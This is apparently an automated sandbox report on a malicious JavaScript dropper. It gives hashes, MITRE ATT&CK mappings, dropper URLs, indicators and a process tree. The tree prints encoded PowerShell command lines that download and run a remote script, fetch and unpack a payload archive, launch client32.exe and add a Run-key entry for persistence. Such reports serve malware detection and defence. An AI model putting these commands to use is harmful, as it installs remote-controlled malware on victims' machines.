c9e6dc44db59f1883e850babac21890e5723d2627a623c47f709e3bb7d073e35

General

Target

doc4978316.js
Size

35KB
MD5

c21cf0ea00b1fd7e53fa14b55dd1be82
SHA1

aff249ddfc8d8fac75d0bf040579cf32e0d50e2a
SHA256

c9e6dc44db59f1883e850babac21890e5723d2627a623c47f709e3bb7d073e35
SHA512

82e4004f78f1aef5dfd1ae83b6dec4422e0960d15b6bb5f845ae7af13617fa9349046ce74be0b893de2e139ee6c93106048f0f2be70199d6567095c14d1ae618
SSDEEP

384:Wj9safdV7zZ/iRRil5Vxy67U2j0etD/1qQMmFcDpOlkjQSHnY4bvwn3QmvCBHx5H:WCWZERq02j0I/1YH9gSRvww7EjzG1

Score

10^/10

persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://birikina.it/files/f1.ps1

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://alnama.net/realty/license.php

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	1980	powershell.exe
6	1980	powershell.exe
8	1980	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Run\ONEN0TEupdate_5977 = "C:\\Users\\Admin\\AppData\\Roaming\\ONEN0TEupdate_5977\\client32.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1980	powershell.exe
1944	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2040 wrote to memory of 2004	2040	wscript.exe	28
PID 2040 wrote to memory of 2004	2040	wscript.exe	28
PID 2040 wrote to memory of 2004	2040	wscript.exe	28
PID 2004 wrote to memory of 1980	2004	cmd.exe	30
PID 2004 wrote to memory of 1980	2004	cmd.exe	30
PID 2004 wrote to memory of 1980	2004	cmd.exe	30
PID 1980 wrote to memory of 1944	1980	powershell.exe	31
PID 1980 wrote to memory of 1944	1980	powershell.exe	31
PID 1980 wrote to memory of 1944	1980	powershell.exe	31

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\doc4978316.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2040
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c PoWersHEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGkAcgBpAGsAaQBuAGEALgBpAHQALwBmAGkAbABlAHMALwBmADEALgBwAHMAMQAiACkA
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PoWersHEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGkAcgBpAGsAaQBuAGEALgBpAHQALwBmAGkAbABlAHMALwBmADEALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -windowstyle minimized -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcABzADoALwAvAGEAbABuAGEAbQBhAC4AbgBlAHQALwByAGUAYQBsAHQAeQAvAGwAaQBjAGUAbgBzAGUALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAcgByAG4AdQBtAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAGMAaAByAHMAPQAnAGEAYgBjAGQAZQBmAGcAaABpAGoAawBsAG0AbgBvAHAAcwB0AHUAdgB3AHgAeQB6AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUgBTAFQAVQBWAFcAWABZAFoAJwA7ACAAJAByAHMAdAByAD0AJwAnADsAIAAkAHIAYQBuAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBhAG4AZABvAG0AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAcgBuAHUAbQA7ACAAJABpACsAKwApACAAewAkAHIAcwB0AHIAKwA9ACQAYwBoAHIAcwBbACQAcgBhAG4ALgBuAGUAeAB0ACgAMAAsACAAJABjAGgAcgBzAC4ATABlAG4AZwB0AGgAKQBdAH0AOwAgACQAcgB6AGkAcAA9ACQAcgBzAHQAcgArACcALgB6AGkAcAAnADsAIAAkAHAAYQB0AGgAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXAAnACsAJAByAHoAaQBwADsAIAAkAHAAegBpAHAAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABPAE4ARQBOADAAVABFAHUAcABkAGEAdABlAF8AJwArACQAcgByAG4AdQBtADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAAJABwAGEAdABoACAALQBkAGUAcwB0AGkAbgBhAHQAaQBvAG4AcABhAHQAaAAgACQAcAB6AGkAcAA7ACAAJABGAE8ATABEAD0ARwBlAHQALQBJAHQAZQBtACAAJABwAHoAaQBwACAALQBGAG8AcgBjAGUAOwAgACQARgBPAEwARAAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAEgAaQBkAGQAZQBuACcAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACQAcABhAHQAaAA7ACAAYwBkACAAJABwAHoAaQBwADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAAJABmAHMAdAByAD0AJABwAHoAaQBwACsAJwBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcAOwAgACQAcgBuAG0APQAnAE8ATgBFAE4AMABUAEUAdQBwAGQAYQB0AGUAXwAnACsAJAByAHIAbgB1AG0AOwAgAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAE4AYQBtAGUAIAAkAHIAbgBtACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwA=
      4⤵
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1944

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
8ca48ff8ff2696ce523d56574a09d854

SHA1
c170f3a13e46cac6a4eff938c9406e77ef63bde3

SHA256
34ed9defe71b323c8c3624dfe36052bcd98124e9acfcc5872d9c839015779111

SHA512
adeeb4095fc98eae44cfa4bd6ca66ef48d81bddab287b80c8c1f581fa87c51678d73166fcfb1573536326ac3cae9f3582266918b3ba495b9fb136a9e49f18e31

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab24B3.tmp

Filesize
61KB

MD5
fc4666cbca561e864e7fdf883a9e6661

SHA1
2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

SHA256
10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

SHA512
c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2650.tmp

Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
47f6cabe54656efbb47f1961003b70a2

SHA1
94b5612ee5378808583d7b09713caefbdb87448b

SHA256
e1cd9d9429519e2bef8f713f05dcd91264ef8fe5a83c6b22a1e48ff287ca53c9

SHA512
da38cd745f7fbd2f1e7032d51efcf50cafc8d68b292aa616b6023082880eec6f453fd217a786d272131b0c7ecfcbd0281fa200e632c91a32096b161f7c798ccc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W7RNLN0H5FK2DRBIZA5V.temp

Filesize
7KB

MD5
47f6cabe54656efbb47f1961003b70a2

SHA1
94b5612ee5378808583d7b09713caefbdb87448b

SHA256
e1cd9d9429519e2bef8f713f05dcd91264ef8fe5a83c6b22a1e48ff287ca53c9

SHA512
da38cd745f7fbd2f1e7032d51efcf50cafc8d68b292aa616b6023082880eec6f453fd217a786d272131b0c7ecfcbd0281fa200e632c91a32096b161f7c798ccc

Download Submit
memory/1944-135-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/1944-137-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/1944-136-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/1944-138-0x000000000258B000-0x00000000025C2000-memory.dmp

Filesize
220KB

Download
memory/1980-63-0x0000000002260000-0x00000000022E0000-memory.dmp

Filesize
512KB

Download
memory/1980-62-0x0000000002260000-0x00000000022E0000-memory.dmp

Filesize
512KB

Download
memory/1980-61-0x0000000002260000-0x00000000022E0000-memory.dmp

Filesize
512KB

Download
memory/1980-60-0x0000000002220000-0x0000000002228000-memory.dmp

Filesize
32KB

Download
memory/1980-59-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads